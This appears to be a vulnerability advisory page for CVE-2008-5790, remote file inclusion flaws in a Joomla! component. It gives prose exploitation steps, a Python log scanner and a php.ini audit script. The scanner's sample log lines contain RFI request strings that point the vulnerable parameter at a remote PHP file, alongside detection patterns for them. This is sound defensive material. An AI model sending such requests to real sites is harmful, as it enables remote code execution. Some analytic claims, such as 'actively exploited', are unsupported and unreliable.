CVE-2008-5790

Source: cve@mitre.org

HIGH
7.5
Published: December 31, 2008 at 11:30 AM
Modified: April 9, 2025 at 12:30 AM

Vulnerability Description

Multiple PHP remote file inclusion vulnerabilities in the Recly!Competitions (com_competitions) component 1.0 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) add.php and (b) competitions.php in includes/competitions/, and the (2) mosConfig_absolute_path parameter to (c) includes/settings/settings.php.

CVSS Metrics

Base Score
7.5
Severity
HIGH
Vector String
AV:N/AC:L/Au:N/C:P/I:P/A:P

Weaknesses (CWE)

Source: nvd@nist.gov

AI Security Analysis

01 // Technical Summary

Recly!Competitions (com_competitions) component 1.0 for Joomla! is vulnerable to multiple remote file inclusion (RFI) vulnerabilities. Attackers can leverage these flaws to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.

02 // Vulnerability Mechanism

Step 1: Payload Preparation: The attacker prepares a malicious PHP script (e.g., a web shell) hosted on a server they control. This script will be used to gain remote code execution.

Step 2: Crafting the Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL targets one of the vulnerable files (e.g., add.php, competitions.php, or settings.php). The URL includes the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameter, set to the URL of the attacker's malicious PHP script.

Step 3: Exploit Delivery: The attacker sends the crafted URL to the vulnerable Joomla! website, typically by directly accessing it through a web browser or using a tool like curl.

Step 4: Code Execution: The vulnerable PHP script, upon receiving the malicious URL, uses the include or require function to fetch and execute the attacker's PHP script from the attacker's server.

Step 5: System Compromise: The attacker's PHP script executes on the server, granting the attacker remote code execution (RCE) capabilities. This allows the attacker to upload files, execute commands, access sensitive data, and potentially take full control of the server.

03 // Deep Technical Analysis

The vulnerability stems from insufficient input validation and sanitization within the Recly!Competitions component. Specifically, the component fails to properly validate the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters before including files. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. The PHP interpreter then executes the attacker-controlled code, granting the attacker control over the server. The root cause is the direct use of user-controlled input in include or require statements without proper sanitization, leading to the RFI condition. This is a classic example of a security misconfiguration.

04 // Exploitation Status

**Actively exploited**. Publicly available proof-of-concept (PoC) exploits exist and are easily accessible. The vulnerability is well-documented and widely known.

05 // Threat Intelligence

This vulnerability is a common attack vector and could be exploited by various threat actors, including script kiddies and more sophisticated groups. It's often used as an initial access point. CISA KEV: Not listed.

06 // Detection & Hunting

  • Web server access logs: Look for HTTP requests whose query string contains the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameter, especially where the value points to an external domain or an unusual file extension. Neither parameter should ever arrive from a client, so any occurrence is worth a look even when the value is a local path.

  • Web application firewall (WAF) logs: WAFs can detect and block RFI attempts by identifying malicious patterns in HTTP requests. Review WAF logs for blocked requests related to this vulnerability.

  • File integrity monitoring (FIM): Monitor critical system files for unauthorized modifications, especially those related to the Joomla! installation and the Recly!Competitions component.

  • Network traffic analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate the attacker is exfiltrating data or establishing a command-and-control (C2) channel.

  • Intrusion detection system (IDS) alerts: An IDS can be configured to detect known RFI attack signatures.

  • Review PHP error logs: Look for errors related to file inclusion, especially those involving external URLs.
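The access-log check above, written out as a small scanner. This is an added example, not part of the advisory: the log lines are constructed samples in Apache combined format using RFC 5737 documentation addresses, and the function names (parse_access_line, find_rfi_params, classify_value, scan_log) are my own. It matches both parameter spellings named in the description, including percent-encoded forms, and separates values that carry a URL scheme (the remote-include case) from plain local paths (still anomalous, because the parameter is never supplied by a legitimate client).

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Client and payload hosts use RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2009:10:01:22 +0000] "GET /components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://203.0.113.99/inc.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2009:10:01:25 +0000] "GET /components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=https%3A%2F%2F203.0.113.99%2Finc.txt HTTP/1.1" 200 480 "-" "curl/7.19.7"
198.51.100.4 - - [12/Jan/2009:10:02:01 +0000] "GET /index.php?option=com_competitions&task=view&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Jan/2009:10:02:10 +0000] "GET /components/com_competitions/includes/competitions/competitions.php?GLOBALS%5BmosConfig_absolute_path%5D=/var/www/html HTTP/1.1" 200 480 "-" "Mozilla/5.0"
"""

# Combined format: client ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The two parameter spellings named in the advisory. Matching is case-insensitive
# and tolerates the bare form without the GLOBALS[...] wrapper.
PARAM_RE = re.compile(r'^(?:GLOBALS\[)?mosConfig_absolute_path\]?$', re.IGNORECASE)

# A leading scheme turns the value into a remote (or PHP stream-wrapper) include target.
REMOTE_RE = re.compile(r'^(?:https?|ftps?|php|data|expect)://', re.IGNORECASE)


def parse_access_line(line):
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_params(query):
    """Return (name, value) pairs whose name is one of the advisory's parameters.

    parse_qsl percent-decodes names, so GLOBALS%5B...%5D is matched as well;
    the value is decoded a second time to catch double encoding.
    """
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if PARAM_RE.match(name):
            hits.append((name, unquote(value)))
    return hits


def classify_value(value):
    """'remote_url' when the value carries a URL scheme, otherwise 'local_path'."""
    return "remote_url" if REMOTE_RE.match(value.strip()) else "local_path"


def scan_log(text):
    """Scan access-log text and return one finding dict per matching parameter."""
    findings = []
    for line in text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(rec["target"])
        for name, value in find_rfi_params(parts.query):
            findings.append({
                "client": rec["client"],
                "time": rec["time"],
                "path": parts.path,
                "param": name,
                "value": value,
                "verdict": classify_value(value),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:10} {f['client']:15} {f['path']} {f['param']}={f['value']}")
```

Run against the sample it reports three findings: two remote_url hits from the first client (one percent-encoded) and one local_path hit, which is still worth triage because the parameter has no legitimate reason to appear in a request. Pipe a real access log into scan_log and feed the verdict field to whatever alerting you use.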

07 // Remediation & Hardening

  • Upgrade: Update the Recly!Competitions component to a patched version or remove it entirely if not needed. Since the component is old, removal is likely the best option.

  • Input validation: Implement robust input validation and sanitization to ensure that the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters only accept expected values and formats. Specifically, ensure these parameters are not used directly in include or require statements.

  • Disable remote file inclusion: Configure php.ini to disable remote file inclusion by setting allow_url_include = Off. This is a critical step.

  • Web application firewall (WAF): Deploy a WAF to filter malicious traffic and block RFI attempts.

  • File permissions: Ensure that web server files have appropriate permissions to prevent unauthorized access and modification.

  • Regular security audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities.

  • Keep Joomla! and all installed components up-to-date with the latest security patches.
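A configuration check for the php.ini directive named above, shown against a weak and a hardened configuration. This is an added example and not part of the advisory: the two ini fragments are constructed, and the helper names (parse_php_ini, ini_bool, audit_ini) are my own. Beyond allow_url_include it also checks register_globals, which is the PHP setting that lets a request parameter such as GLOBALS[mosConfig_absolute_path] overwrite a server-side variable in the first place, and allow_url_fopen, the wider switch that allow_url_include depends on; the last is flagged as recommended rather than critical because turning it off can affect legitimate code.

```python
# Constructed php.ini fragment in the weak state (not from any real server).
WEAK_INI = """\
[PHP]
; directives relevant to remote file inclusion
allow_url_fopen = On
allow_url_include = On
register_globals = On
"""

# The same directives in the hardened state.
HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
"""

# directive: (required value, PHP's default when the directive is absent, severity)
# allow_url_include defaults Off, register_globals defaults Off (and was removed in
# PHP 5.4), allow_url_fopen defaults On.
CHECKS = {
    "allow_url_include": (False, False, "critical"),
    "register_globals": (False, False, "critical"),
    "allow_url_fopen": (False, True, "recommended"),
}


def parse_php_ini(text):
    """Parse php.ini text into {directive: raw value}.

    ';' starts a comment (this simple parser does not special-case ';' inside
    quoted values), '[section]' lines are skipped, keys are lower-cased.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_bool(value):
    """Interpret a php.ini boolean the way PHP does: On/True/Yes/1 are true,
    Off/False/No/None/0/empty are false, other integers follow their value."""
    v = value.strip().lower()
    if v in ("on", "true", "yes"):
        return True
    if v in ("", "off", "false", "no", "none"):
        return False
    try:
        return int(v) != 0
    except ValueError:
        raise ValueError(f"not a boolean ini value: {value!r}")


def audit_ini(text):
    """Return (directive, observed, severity) for every directive not in the required state.

    An absent directive is judged by PHP's default, so a file that never mentions
    allow_url_fopen is still reported because its default is On.
    """
    settings = parse_php_ini(text)
    findings = []
    for directive, (required, default, severity) in CHECKS.items():
        raw = settings.get(directive)
        observed = default if raw is None else ini_bool(raw)
        if observed != required:
            findings.append((directive, "On" if observed else "Off", severity))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_ini(ini) or "no findings")
```

Point audit_ini at the output of php --ini (or the loaded configuration path from phpinfo) rather than at a copy in version control, since the running interpreter may be reading a different file than the one you think is deployed.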

08 // Affected Products

Recly!Competitions component 1.0 for Joomla!

09 // Discovered Proof of Concept Links